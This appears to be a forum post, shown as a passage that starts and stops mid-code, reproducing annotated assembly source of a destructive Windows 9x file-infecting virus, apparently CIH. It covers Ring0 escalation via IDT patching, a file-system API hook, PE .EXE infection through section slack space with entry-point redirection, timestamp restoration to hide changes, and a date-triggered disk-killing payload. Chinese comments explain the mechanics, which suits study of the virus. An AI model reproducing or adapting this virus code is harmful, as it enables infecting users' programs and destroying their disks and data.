000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 02eh, 074h, 065h, 078h, 074h, 000h, 000h, 000h db 000h, 010h, 000h, 000h, 000h, 010h, 000h, 000h db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 020h, 000h, 000h, 060h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 0c3h, 000h, 000h, 000h, 000h, 000h, 000h, 000h dd 00000000h, VirusSize OriginalAppEXE ENDS ; **************************************************************************** ; * My Virus Game * ; **************************************************************************** ; ********************************************************* ; * Constant Define * ; ********************************************************* TRUE = 1 FALSE = 0 DEBUG = TRUE MajorVirusVersion = 1 ;主版本号 MinorVirusVersion = 4 ;副版本号 VirusVersion = MajorVirusVersion*10h+MinorVirusVersion ;合成版本号 IF DEBUG ;是否是调试用 FirstKillHardDiskNumber = 81h ;杀掉第二个硬盘“d:” HookExceptionNumber = 05h ;使用5号中断 ELSE FirstKillHardDiskNumber = 80h ;杀掉第一个硬盘“c:” HookExceptionNumber = 03h ;使用3号中断 ENDIF FileNameBufferSize = 7fh ; ********************************************************* ; ********************************************************* VirusGame SEGMENT ASSUME CS:VirusGame, DS:VirusGame, SS:VirusGame ASSUME ES:VirusGame, FS:VirusGame, GS:VirusGame ; ********************************************************* ; * Ring3 Virus Game Initial Program * ; ********************************************************* MyVirusStart: push ebp ; ************************************* ; * Let\'s Modify Structured Exception * ; * Handing, Prevent Exception Error * ; * Occurrence, Especially in NT. * ; ************************************* lea eax, [esp-04h*2] xor ebx, ebx xchg eax, fs:[ebx] call @0 @0: pop ebx ;获取程序起始偏移量? ;用此偏移量+相对偏移量获得绝对地址(病毒程序大量用到) lea ecx, StopToRunVirusCode-@0[ebx] push ecx push eax ; ************************************* ; * Let\'s Modify * ; * IDT(Interrupt Descriptor Table) * ; * to Get Ring0 Privilege... * ; ************************************* push eax ; sidt [esp-02h] ; Get IDT Base Address ?;获得中断描述符表的基址到ebx pop ebx ; add ebx, HookExceptionNumber*08h+04h ; ZF = 0 ;计算要用中断的基址到ebx cli ;在改表项前关中断? mov ebp, [ebx] ; Get Exception Base mov bp, [ebx-04h] ; Entry Point ?;取得中断基址到ebp lea esi, MyExceptionHook-@1[ecx] push esi ?;esi为病毒中断例程地址 mov [ebx-04h], si ; shr esi, 16 ; Modify Exception mov [ebx+02h], si ; Entry Point Address;修改中断基址使指向病毒中断例程 pop esi ; ************************************* ; * Generate Exception to Get Ring0 * ; ************************************* int HookExceptionNumber ; GenerateException;以中断的方式进入0级 ReturnAddressOfEndException = $ ; ************************************* ; * Merge All Virus Code Section * ; ************************************* push esi mov esi, eax ;esi指向病毒开始处 LoopOfMergeAllVirusCodeSection: mov ecx, [eax-04h] rep movsb ;拷贝病毒代码到分配好的系统内存首址 sub eax, 08h mov esi, [eax] or esi, esi jz QuitLoopOfMergeAllVirusCodeSection ; ZF = 1 ;拷贝结束 jmp LoopOfMergeAllVirusCodeSection ;拷贝下一段 QuitLoopOfMergeAllVirusCodeSection: pop esi ; ************************************* ; * Generate Exception Again * ; ************************************* int HookExceptionNumber ; GenerateException Aga ;再一次进入0级 ; ************************************* ; * Let\'s Restore * ; * Structured Exception Handing * ; ************************************* ReadyRestoreSE: sti ;开中断 xor ebx, ebx jmp RestoreSE ; ************************************* ; * When Exception Error Occurs, * ; * Our OS System should be in NT. * ; * So My Cute Virus will not * ; * Continue to Run, it Jmups to * ; * Original Application to Run. * ; ************************************* StopToRunVirusCode: @1 = StopToRunVirusCode xor ebx, ebx mov eax, fs:[ebx] mov esp, [eax] RestoreSE: pop dword ptr fs:[ebx] pop eax ; ************************************* ; * Return Original App to Execute * ; ************************************* pop ebp push 00401000h ; Push Original OriginalAddressOfEntryPoint = $-4 ; App Entry Point to Stack ;把原程序的开始地址压栈 ret ; Return to Original App Entry Point ;以子程序返回形式返回到原程序的开始处 ; ********************************************************* ; * Ring0 Virus Game Initial Program * ; ********************************************************* MyExceptionHook: @2 = MyExceptionHook jz InstallMyFileSystemApiHook ;如果病毒代码已拷贝好了 ;转到安装文件系统钩子的程序 ; ************************************* ; * Do My Virus Exist in System !? * ; ************************************* mov ecx, dr0 ;察看dr0是否设置过(dr0为病毒驻留标志) jecxz AllocateSystemMemoryPage ;没有设置,则分配系统内存 add dword ptr [esp], ReadyRestoreSE-ReturnAddressOfEndException ; ************************************* ; * Return to Ring3 Initial Program * ; ************************************* ExitRing0Init: mov [ebx-04h], bp ; shr ebp, 16 ; Restore Exception mov [ebx+02h], bp ; ;恢复原来的中断基址 iretd ;中断返回 ; ************************************* ; * Allocate SystemMemory Page to Use * ; ************************************* AllocateSystemMemoryPage: mov dr0, ebx ; Set the Mark of My Virus Exist in System ;设置dr0,它是病毒驻留的标志 push 00000000fh ; push ecx ; push 0ffffffffh ; push ecx ;调用方法ULONG EXTERN _PageAllocate(ULONG nPages, ULONG pType, ULONG VM, ;ULONG AlignMask, ULONG minPhys, ULONG maxPhys, ULONG *PhysAddr, ;ULONG flags); push ecx ; push ecx ; push 000000001h ; push 000000002h ; int 20h ; VMMCALL _PageAllocate;VXD调用 _PageAllocate = $ ; dd 00010053h ; Use EAX, ECX, EDX, and flags add esp, 08h*04h ;恢复栈指针 xchg edi, eax ; EDI = SystemMemory Start Address ; EDI指向分配好的系统内存首址 lea eax, MyVirusStart-@2[esi] ;eax指向病毒开始处 iretd ; Return to Ring3 Initial Program ;退出中断,回3级(回到\"Merge All Virus Code Section\") ; ************************************* ; * Install My File System Api Hook * ; ************************************* InstallMyFileSystemApiHook: lea eax, FileSystemApiHook-@6[edi] ;指向文件系统钩子程序首址 push eax ; int 20h ; VXDCALL IFSMgr_InstallFileSystemApiHook IFSMgr_InstallFileSystemApiHook = $ ; dd 00400067h ; Use EAX, ECX, EDX, and flags ;在调用后变为call [IFSMgr_InstallFileSystemApiHook] mov dr0, eax ; Save OldFileSystemApiHook Address ;保存原来的文件系统钩子程序首址到dr0(改调用的返回值是前一个链值) pop eax ; EAX = FileSystemApiHook Address ; Save Old IFSMgr_InstallFileSystemApiHook Entry Point mov ecx, IFSMgr_InstallFileSystemApiHook-@2[esi] mov edx, [ecx] ;edx为IFSMgr_InstallFileSystemApiHook功能的地址 mov OldInstallFileSystemApiHook-@3[eax], edx ?;保存 ; Modify IFSMgr_InstallFileSystemApiHook Entry Point lea eax, InstallFileSystemApiHook-@3[eax] mov [ecx], eax ?;设置新的IFSMgr_InstallFileSystemApiHook功能调用的地址 ;使指向InstallFileSystemApiHook cli jmp ExitRing0Init ?;退出0级(int 3 or int 5) ; ********************************************************* ; * Code Size of Merge Virus Code Section * ; ********************************************************* CodeSizeOfMergeVirusCodeSection = offset $ ; ********************************************************* ; * IFSMgr_InstallFileSystemApiHook * ; ********************************************************* InstallFileSystemApiHook: ;新的IFSMgr_InstallFileSystemApiHook功能调用 push ebx call @4 ; @4: ; pop ebx ; mov ebx, offset FileSystemApiHook ;获得当前指令的偏移地址 add ebx, FileSystemApiHook-@4 ;加上偏移的差=FileSystemApiHook的偏移 push ebx int 20h ; VXDCALL IFSMgr_RemoveFileSystemApiHook ;调用VXD移去指向FileSystemApiHook的钩子 IFSMgr_RemoveFileSystemApiHook = $ dd 00400068h ; Use EAX, ECX, EDX, and flags ;调用号 pop eax ; Call Original IFSMgr_InstallFileSystemApiHook ; to Link Client FileSystemApiHook push dword ptr [esp+8] call OldInstallFileSystemApiHook-@3[ebx] ;调用原来的IFSMgr_InstallFileSystemApiHook功能设置钩子 pop ecx push eax ; Call Original IFSMgr_InstallFileSystemApiHook ; to Link My FileSystemApiHook push ebx call OldInstallFileSystemApiHook-@3[ebx] ;调用原来的IFSMgr_InstallFileSystemApiHook功能设置钩子 pop ecx mov dr0, eax ; Adjust OldFileSystemApiHook Address ;调整原来的地址 pop eax pop ebx ret ; ********************************************************* ; * Static Data * ; ********************************************************* OldInstallFileSystemApiHook dd ? ;原来的InstallFileSystemApiHook调用的地址 ; ********************************************************* ; * IFSMgr_FileSystemHook * ; ********************************************************* ; ************************************* ; * IFSMgr_FileSystemHook Entry Point * ; ************************************* FileSystemApiHook: ;安装好的文件系统钩子 @3 = FileSystemApiHook pushad ;保存寄存器(20h长) call @5 ; @5: ; pop esi ; mov esi, offset ;esi为当前指令的偏移 add esi, VirusGameDataStartAddress-@5 ;esi为FileSystemApiHook的偏移加上到VirusGameDataStartAddress的偏移之差=VirusGameDataStartAddress的偏移 ; ************************************* ; * Is OnBusy !? * ; ************************************* test byte ptr (OnBusy-@6)[esi], 01h ; if ( OnBusy ) ;测试\"忙\"标志 jnz pIFSFunc ; goto pIFSFunc ;\"忙\"则转到pIFSFunc ; ************************************* ; * Is OpenFile !? * ; ************************************* ; if ( NotOpenFile ) ; goto prevhook lea ebx, [esp+20h+04h+04h] ;ebx为FunctionNum的地址 ;文件系统钩子的调用格式如下 ;FileSystemApiHookFunction(pIFSFunc FSDFnAddr, int FunctionNum, int Drive,int ResourceFlags, int CodePage, pioreq pir) ;助标2 cmp dword ptr [ebx], 00000024h ;测试此次调用是否是为了打开文件 ;在DDK的ifs.h中定义的#define IFSFN_OPEN 36 jne prevhook ;不是就跳到前一个文件钩子去 ; ************************************* ; * Enable OnBusy * ; ************************************* inc byte ptr (OnBusy-@6)[esi] ; Enable OnBusy ;设置\"忙\"标志为\"忙\" ; ************************************* ; * Get FilePath\'s DriveNumber, * ; * then Set the DriveName to * ; * FileNameBuffer. * ; ************************************* ; * Ex. If DriveNumber is 03h, * ; * DriveName is \'C:\'. * ; ************************************* ; mov esi, offset FileNameBuffer add esi, FileNameBuffer-@6 ;esi指向FileNameBuffer push esi ;保存之 mov al, [ebx+04h] ;ebx+4为int Drive的地址 cmp al, 0ffh ;是否是UNC(universal naming conventions)地址 je CallUniToBCSPath ;是就转 add al, 40h mov ah, \':\' mov [esi], eax ;处理成\"X:\"的形式 inc esi inc esi ; ************************************* ; * UniToBCSPath * ; ************************************* ; * This Service Converts * ; * a Canonicalized Unicode Pathname * ;把Canonicalized Unicode的字符转换为普通的BCS字符集 ; * to a Normal Pathname in the * ; * Specified BCS Character Set. * ; ************************************* ;调用方法 UniToBCSPath(unsigned char * pBCSPath, ParsedPath * pUniPath, unsigned int maxLength, int charSet) CallUniToBCSPath: push 00000000h ;字符集 push FileNameBufferSize ;字符长度 mov ebx, [ebx+10h] mov eax, [ebx+0ch] add eax, 04h push eax ;Uni字符首址 push esi ;BCS字符首址 int 20h ; VXDCall UniToBCSPath ;调用UniToBCSPath UniToBCSPath = $ dd 00400041h ;调用id add esp, 04h*04h ; ************************************* ; * Is FileName \'.EXE\' !? * ; ************************************* ; cmp [esi+eax-04h], \'.EXE\' cmp [esi+eax-04h], \'EXE.\' ;测试是否是*.EXE(可执行)文件 pop esi jne DisableOnBusy IF DEBUG ; ************************************* ; * Only for Debug * ; ************************************* ; cmp [esi+eax-06h], \'FUCK\' cmp [esi+eax-06h], \'KCUF\' ;如果是测试用途则测试是否是\"FUCK.EXE\" jne DisableOnBusy ENDIF ; ************************************* ; * Is Open Existing File !? * ; ************************************* ; if ( NotOpenExistingFile ) ; goto DisableOnBusy cmp word ptr [ebx+18h], 01h ;测试是否打开 jne DisableOnBusy ; ************************************* ; * Get Attributes of the File * ; ************************************* mov ax, 4300h ;IFSMgr_Ring0_FileIO的获得文件属性号(R0_FILEATTRIBUTES/GET_ATTRIBUTES) int 20h ; VXDCall IFSMgr_Ring0_FileIO ;调用IFSMgr_Ring0_FileIO的获得文件属性的功能 IFSMgr_Ring0_FileIO = $ dd 00400032h ;调用号 jc DisableOnBusy ;失败否? push ecx ; ************************************* ; * Get IFSMgr_Ring0_FileIO Address * ; ************************************* mov edi, dword ptr (IFSMgr_Ring0_FileIO-@7)[esi] mov edi, [edi] ;获得IFSMgr_Ring0_FileIO调用的地址 ; ************************************* ; * Is Read-Only File !? * ; ************************************* test cl, 01h jz OpenFile ;测试是否是只读文件 ; ************************************* ; * Modify Read-Only File to Write * ; ************************************* mov ax, 4301h ;IFSMgr_Ring0_FileIO的获得文件属性号(R0_FILEATTRIBUTES/SET_ATTRIBUTES ) xor ecx, ecx call edi ; VXDCall IFSMgr_Ring0_FileIO ;调用IFSMgr_Ring0_FileIO的改文件属性功能,使文件可写 ; ************************************* ; * Open File * ; ************************************* OpenFile: xor eax, eax mov ah, 0d5h ;IFSMgr_Ring0_FileIO的打开文件功能号(R0_OPENCREATFILE or RO_OPENCREAT_IN_CONTEXT) xor ecx, ecx ;文件属性 xor edx, edx inc edx mov ebx, edx inc ebx ;esi为文件名首址 call edi ; VXDCall IFSMgr_Ring0_FileIO ;调用IFSMgr_Ring0_FileIO的打开文件功能 xchg ebx, eax ; mov ebx, FileHandle ;在ebx中保存文件句柄 ; ************************************* ; * Need to Restore * ; * Attributes of the File !? * ; ************************************* pop ecx pushf test cl, 01h jz IsOpenFileOK ;是否需要恢复文件属性(有写属性就不需要恢复了) ; ************************************* ; * Restore Attributes of the File * ; ************************************* mov ax, 4301h ;IFSMgr_Ring0_FileIO的获得文件属性号(R0_FILEATTRIBUTES/SET_ATTRIBUTES) call edi ; VXDCall IFSMgr_Ring0_FileIO ;恢复文件属性 ; ************************************* ; * Is Open File OK !? * ; ************************************* IsOpenFileOK: popf jc DisableOnBusy ;打开是否成功? ; ************************************* ; * Open File Already Succeed. ^__^ * ; ************************************* push esi ; Push FileNameBuffer Address to Stack ;把文件名数据区首址压栈 pushf ; Now CF = 0, Push Flag to Stack ;保存标志位 add esi, DataBuffer-@7 ; mov esi, offset DataBuffer ;esi指向数据区首址 ; *************************** ; * Get OffsetToNewHeader * ; *************************** xor eax, eax mov ah, 0d6h ;IFSMgr_Ring0_FileIO的读文件功能号(R0_READFILE) ; For Doing Minimal VirusCode\'s Length, ; I Save EAX to EBP. mov ebp, eax push 00000004h ;读取4个字节 pop ecx push 0000003ch ;读取dos文件头偏移3ch处的Windows文件头首部偏移 pop edx call edi ; VXDCall IFSMgr_Ring0_FileIO ;读文件到esi mov edx, [esi] ;Windows文件头首部偏移放到edx ; *************************** ; * Get \'PE\\0\' Signature * ; * of ImageFileHeader, and * ; * Infected Mark. * ; *************************** dec edx mov eax, ebp ;功能号 call edi ; VXDCall IFSMgr_Ring0_FileIO ;读文件到esi ; *************************** ; * Is PE !? * ; *************************** ; * Is the File * ; * Already Infected !? * ; *************************** ; * WinZip Self-Extractor * ; * doesn\'t Have Infected * ; * Mark Because My Virus * ; * doesn\'t Infect it. * ; *************************** ; cmp [esi], \'\\0PE\\0\' cmp dword ptr [esi], 00455000h ;判断是否是PE文件(标志\"PE\\0\\0\") jne CloseFile ;不是就关闭文件 ; ************************************* ; * The File is ^o^ * ; * PE(Portable Executable) indeed. * ; ************************************* ; * The File isn\'t also Infected. * ; ************************************* ; ************************************* ; * Start to Infect the File * ; ************************************* ; * Registers Use Status Now : * ; * * ; * EAX = 04h * ; * EBX = File Handle * ; * ECX = 04h * ; * EDX = \'PE\\0\\0\' Signature of * ; * ImageFileHeader Pointer\'s * ; * Former Byte. * ; * ESI = DataBuffer Address ==> @8 * ; * EDI = IFSMgr_Ring0_FileIO Address * ; * EBP = D600h ==> Read Data in File * ; ************************************* ; * Stack Dump : * ; * * ; * ESP => ------------------------- * ; * | EFLAG(CF=0) | * ; * ------------------------- * ; * | FileNameBufferPointer | * ; * ------------------------- * ; * | EDI | * ; * ------------------------- * ; * | ESI | * ; * ------------------------- * ; * | EBP | * ; * ------------------------- * ; * | ESP | * ; * ------------------------- * ; * | EBX | * ; * ------------------------- * ; * | EDX | * ; * ------------------------- * ; * | ECX |
|
|
16楼#
发布于:2002-05-31 19:49
;续:
| * ; * ------------------------- * ; * | EAX | * ; * ------------------------- * ; * | Return Address | * ; * ------------------------- * ; ************************************* push ebx ; Save File Handle ;保存文件句柄 push 00h ; Set VirusCodeSectionTableEndMark ; *************************** ; * Let\'s Set the * ; * Virus\' Infected Mark * ; *************************** push 01h ; Size push edx ; Pointer of File ;edx指向PE文件头偏移00h push edi ; Address of Buffer ;edi为IFSMgr_Ring0_FileIO的地址(原注释有误) ; *************************** ; * Save ESP Register * ; *************************** mov dr1, esp ; *************************** ; * Let\'s Set the * ; * NewAddressOfEntryPoint * ; * ( Only First Set Size ) * ; *************************** push eax ; Size ; *************************** ; * Let\'s Read * ; * Image Header in File * ; *************************** mov eax, ebp mov cl, SizeOfImageHeaderToRead ;要读2个字节(WORD NumberOfSections) add edx, 07h ; Move EDX to NumberOfSections ;PE文件头+07h为NumberOfSections(块个数) call edi ; VXDCall IFSMgr_Ring0_FileIO ;读出NumberOfSections(块个数)到esi ; *************************** ; * Let\'s Set the * ; * NewAddressOfEntryPoint * ; * ( Set Pointer of File, * ; * Address of Buffer ) * ; *************************** lea eax, (AddressOfEntryPoint-@8)[edx] push eax ; Pointer of File lea eax, (NewAddressOfEntryPoint-@8)[esi] push eax ; Address of Buffer ; *************************** ; * Move EDX to the Start * ; * of SectionTable in File * ; *************************** movzx eax, word ptr (SizeOfOptionalHeader-@8)[esi] lea edx, [eax+edx+12h] ;edx为SectionTable的偏移 ; *************************** ; * Let\'s Get * ; * Total Size of Sections * ; *************************** mov al, SizeOfScetionTable ;每个块表项(ScetionTable)的大小(字节) ; I Assume NumberOfSections <= 0ffh mov cl, (NumberOfSections-@8)[esi] mul cl ;每个块表项乘以块个数=块表大小 ; *************************** ; * Let\'s Set Section Table * ; *************************** ; Move ESI to the Start of SectionTable lea esi, (StartOfSectionTable-@8)[esi] ;esi指向块表首址(在病毒动态数据区中) push eax ; Size ;块表大小 push edx ; Pointer of File ;edx为SectionTable的偏移 push esi ; Address of Buffer ; ; *************************** ; * The Code Size of Merge * ; * Virus Code Section and * ; * Total Size of Virus * ; * Code Section Table Must * ; * be Small or Equal the * ; * Unused Space Size of * ; * Following Section Table * ; *************************** inc ecx push ecx ; Save NumberOfSections+1 shl ecx, 03h ;*8 push ecx ; Save TotalSizeOfVirusCodeSectionTable ;预留病毒块表空间 add ecx, eax add ecx, edx ;ecx+文件的正文的偏移 sub ecx, (SizeOfHeaders-@9)[esi] not ecx inc ecx ;求补 ;ecx为文件头大小-正文的偏移=未用空间 ; Save My Virus First Section Code ; Size of Following Section Table... ; ( Not Include the Size of Virus Code Section Table ) push ecx xchg ecx, eax ; ECX = Size of Section Table ;ecx为块表大小 ; Save Original Address of Entry Point mov eax, (AddressOfEntryPoint-@9)[esi] ;入口RVA地址 add eax, (ImageBase-@9)[esi] ;装入基址 mov (OriginalAddressOfEntryPoint-@9)[esi], eax ;保存装入后实际的入口地址 cmp word ptr [esp], small CodeSizeOfMergeVirusCodeSection ;未用空间和病毒第一块大小比较 jl OnlySetInfectedMark ;小于就只设感染标志 ; *************************** ; * Read All Section Tables * ; *************************** mov eax, ebp ;读的功能号 call edi ; VXDCall IFSMgr_Ring0_FileIO ;读块表到esi(@9处) ; *************************** ; * Full Modify the Bug : * ; * WinZip Self-Extractor * ; * Occurs Error... * ; *************************** ; * So When User Opens * ; * WinZip Self-Extractor, * ; * Virus Doesn\'t Infect it.* ; *************************** ; * First, Virus Gets the * ; * PointerToRawData in the * ; * Second Section Table, * ; * Reads the Section Data, * ; * and Tests the String of * ; * \'WinZip(R)\'...... * ; *************************** xchg eax, ebp push 00000004h pop ecx ;读4字节 push edx mov edx, (SizeOfScetionTable+PointerToRawData-@9)[ebx] ;edx为第二块的偏移(.rdata) add edx, 12h ;加10h+2h(10h处为\"WinZip....\") call edi ; VXDCall IFSMgr_Ring0_FileIO ;读4字节到esi ; cmp [esi], \'nZip\' cmp dword ptr [esi], \'piZn\' ;判断是否是WinZip自解压文件 je NotSetInfectedMark ;是就不设置感染标志 pop edx ;edx指向块表在文件中首址 ; *************************** ; * Let\'s Set Total Virus * ; * Code Section Table * ; *************************** ; EBX = My Virus First Section Code ; Size of Following Section Table pop ebx ; 未用空间大小 pop edi ; EDI = TotalSizeOfVirusCodeSectionTabl pop ecx ; ECX = NumberOfSections+1 push edi ; Size add edx, ebp ; ebp为块表大小 push edx ; Pointer of File ;指向块表后(第一块) add ebp, esi ; ebp指向病毒数据区的块表后(第一块) push ebp ; Address of Buffer ; *************************** ; * Set the First Virus * ; * Code Section Size in * ; * VirusCodeSectionTable * ; *************************** lea eax, [ebp+edi-04h] mov [eax], ebx ;设置病毒代码第一块的大小(未用空间大小)到病毒块表 ; *************************** ; * Let\'s Set My Virus * ; * First Section Code * ; *************************** push ebx ; Size ;病毒代码第一块的大小(未用空间大小) add edx, edi push edx ; Pointer of File ;指向块表后(第一块)+Size??=病毒正文(病毒开始处) lea edi, (MyVirusStart-@9)[esi] push edi ; Address of Buffer ;指向病毒开始处 ; *************************** ; * Let\'s Modify the * ; * AddressOfEntryPoint to * ; * My Virus Entry Point * ; *************************** mov (NewAddressOfEntryPoint-@9)[esi], edx ;保存新的程序入口(病毒正文) ; *************************** ; * Setup Initial Data * ; *************************** lea edx, [esi-SizeOfScetionTable] ;edx先减一项块表长度,以配合下面的\"助标1\" mov ebp, offset VirusSize ;ebp为病毒长度 jmp StartToWriteCodeToSections ; *************************** ; * Write Code to Sections * ; *************************** LoopOfWriteCodeToSections: add edx, SizeOfScetionTable ;助标1: ;指向下一块表项 mov ebx, (SizeOfRawData-@9)[edx] ;ebx为该块表项的SizeOfRawData(块大小) sub ebx, (VirtualSize-@9)[edx] ;减去VirtualSize=该块未用空间 jbe EndOfWriteCodeToSections push ebx ; Size sub eax, 08h mov [eax], ebx ;写入病毒块表 mov ebx, (PointerToRawData-@9)[edx] ;ebx为块的物理(实际)偏移? add ebx, (VirtualSize-@9)[edx] ;加上VirtualSize push ebx ; Pointer of File ;ebx指向该块未用空间的文件指针 push edi ; Address of Buffer mov ebx, (VirtualSize-@9)[edx] add ebx, (VirtualAddress-@9)[edx] add ebx, (ImageBase-@9)[esi] ;ebx为该块装入后的实际地址 mov [eax+4], ebx ;保存到病毒块表中 mov ebx, [eax] ;该块未用空间大小 add (VirtualSize-@9)[edx], ebx ;加到该块表项的VirtualSize ; Section contains initialized data ==> 00000040h ; Section can be Read. ==> 40000000h or (Characteristics-@9)[edx], 40000040h ;改该块表项的块属性(改为可读,并包含初始化数据) StartToWriteCodeToSections: sub ebp, ebx ;病毒大小-病毒块大小 jbe SetVirusCodeSectionTableEndMark ;如果小于(病毒插入完毕)就设置病毒块表结束符 add edi, ebx ; Move Address of Buffer ;指向病毒下一块 EndOfWriteCodeToSections: loop LoopOfWriteCodeToSections ; *************************** ; * Only Set Infected Mark * ; *************************** OnlySetInfectedMark: mov esp, dr1 ;只设置感染标志 jmp WriteVirusCodeToFile ;跳到写病毒到要传染的文件的程序 ; *************************** ; * Not Set Infected Mark * ; *************************** NotSetInfectedMark: add esp, 3ch ;不设置感染标志 jmp CloseFile ;跳到关文件 ; *************************** ; * Set Virus Code * ; * Section Table End Mark * ; *************************** SetVirusCodeSectionTableEndMark: ; Adjust Size of Virus Section Code to Correct Value add [eax], ebp ;更正病毒块表的最后一项 add [esp+08h], ebp ; Set End Mark xor ebx, ebx mov [eax-04h], ebx ;设置块表结束标志 ; *************************** ; * When VirusGame Calls * ; * VxDCall, VMM Modifies * ; * the \'int 20h\' and the * ; * \'Service Identifier\' * ; * to \'Call [XXXXXXXX]\'. * ; *************************** ; * Before Writing My Virus * ; * to File, I Must Restore * ; * them First. ^__^ * ; *************************** lea eax, (LastVxDCallAddress-2-@9)[esi] ;上一个调用VXD的指令的地址 mov cl, VxDCallTableSize ;所用VXD调用的个数 LoopOfRestoreVxDCallID: mov word ptr [eax], 20cdh ;还原成\"int 20h\"的形式 mov edx, (VxDCallIDTable+(ecx-1)*04h-@9)[esi] ;从VxDCallIDTable取出VXD调用的id号放到edx mov [eax+2], edx ;放到\"int 20h\"的后面,形成\'int 20h\' and the \'Service Identifier\'的形式 movzx edx, byte ptr (VxDCallAddressTable+ecx-1-@9)[esi] ;VxDCallAddressTable中放着各个调用VXD的指令的地址之差 sub eax, edx ;eax为上一个调用地址 loop LoopOfRestoreVxDCallID ;还原其他的调用 ; *************************** ; * Let\'s Write * ; * Virus Code to the File * ; *************************** WriteVirusCodeToFile: mov eax, dr1 ;dr1为前面所保存的esp mov ebx, [eax+10h] ;ebx为保存在栈中的保存文件句柄 mov edi, [eax] ;edi为保存在栈中的IFSMgr_Ring0_FileIO调用的地址 LoopOfWriteVirusCodeToFile: pop ecx ;病毒代码各段的偏移 jecxz SetFileModificationMark ;到病毒偏移零为止 mov esi, ecx mov eax, 0d601h ;写文件功能号(R0_WRITEFILE) pop edx ;文件指针 pop ecx ;要写的字节数 call edi ; VXDCall IFSMgr_Ring0_FileIO ;写文件 ;依次写入:各段病毒代码,病毒块表,新的文件块表,新的程序入口,感染标志 jmp LoopOfWriteVirusCodeToFile ; *************************** ; * Let\'s Set CF = 1 ==> * ; * Need to Restore File * ; * Modification Time * ; *************************** SetFileModificationMark: pop ebx pop eax stc ; Enable CF(Carry Flag) ;设置进位标志 pushf ;标志位压栈 ; ************************************* ; * Close File * ; ************************************* CloseFile: xor eax, eax mov ah, 0d7h ;关闭文件功能号 call edi ; VXDCall IFSMgr_Ring0_FileIO ; ************************************* ; * Need to Restore File Modification * ; * Time !? * ; ************************************* popf pop esi jnc IsKillComputer ;CF=0就KillComputer :-( ; ************************************* ; * Restore File Modification Time * ; ************************************* mov ebx, edi mov ax, 4303h mov ecx, (FileModificationTime-@7)[esi] mov edi, (FileModificationTime+2-@7)[esi] call ebx ; VXDCall IFSMgr_Ring0_FileIO ;修改文件修改时间 ; ************************************* ; * Disable OnBusy * ; ************************************* DisableOnBusy: dec byte ptr (OnBusy-@7)[esi] ; Disable OnBus ; ************************************* ; * Call Previous FileSystemApiHook * ; ************************************* prevhook: popad ;恢复所有寄存器 mov eax, dr0 ; 保存的原来的文件系统钩子程序首址 jmp [eax] ; Jump to prevhook ;跳到前一个钩子去执行 ; ************************************* ; * Call the Function that the IFS * ; * Manager Would Normally Call to * ; * Implement this Particular I/O * ; * Request. * ; ************************************* pIFSFunc: ; FileSystemApiHookFunction的参数见助标2 mov ebx, esp ; ebx指向esp以获得FileSystemApiHookFunction的参数地址 push dword ptr [ebx+20h+04h+14h] ; Push pioreq ;把参数pioreq pir压栈(ebx+20h+04h为参数首址) call [ebx+20h+04h] ; Call pIFSFunc ;调用pIFSFunc FSDFnAddr(FSD的功能地址) pop ecx ; mov [ebx+1ch], eax ; Modify EAX Value in Stack ;改eax的值(在栈中,20h为pushad的压栈大小,1ch为第一个压栈的eax) ; *************************** ; * After Calling pIFSFunc, * ; * Get Some Data from the * ; * Returned pioreq. * ; *************************** cmp dword ptr [ebx+20h+04h+04h], 00000024h ;详见助标2 jne QuitMyVirusFileSystemHook ; ***************** ; * Get the File * ; * Modification * ; * Date and Time * ; * in DOS Format.* ; ***************** mov eax, [ecx+28h] mov (FileModificationTime-@6)[esi], eax ;保存获得的文件时间和日期 ; *************************** ; * Quit My Virus\' * ; * IFSMgr_FileSystemHook * ; *************************** QuitMyVirusFileSystemHook: popad ;恢复所有寄存器 ret ;从病毒设置的文件钩子程序中退出 ; ************************************* ; * Kill Computer !? ... *^_^* * ;KillComputer模块(!!十分危险,所以原理分析及详细注释暂不公布!!) ; ************************************* IsKillComputer: ; Get Now Day from BIOS CMOS mov al, 07h out 70h, al in al, 71h xor al, 26h ; ??/26/???? ;从CMOS中获得当前的日期 IF DEBUG jmp DisableOnBusy ELSE jnz DisableOnBusy ENDIF ;如果是每月的26号就KillComputer(太危险了).*^_^*. ; ************************************** ; * Kill Kill Kill Kill Kill Kill Kill * ; * Kill Kill Kill Kill Kill Kill Kill * ; * Kill Kill Kill Kill Kill Kill Kill * ; * Kill Kill Kill Kill Kill Kill Kill * ; * Kill Kill Kill Kill Kill Kill Kill * ; * Kill Kill Kill Kill Kill Kill Kill * ; * Kill Kill Kill Kill Kill Kill Kill * ; * Kill Kill Kill Kill Kill Kill Kill * ; * Kill Kill Kill Kill Kill Kill Kill * ; * Kill Kill Kill Kill Kill Kill Kill * ; * Kill Kill Kill Kill Kill Kill Kill * ; * Kill Kill Kill Kill Kill Kill Kill * ; * Kill Kill Kill Kill Kill Kill Kill * ; * Kill Kill Kill Kill Kill Kill Kill * ; * Kill Kill Kill Kill Kill Kill Kill * ; * Kill Kill Kill Kill Kill Kill Kill * ; * Kill Kill Kill Kill Kill Kill Kill * ; * Kill Kill Kill Kill Kill Kill 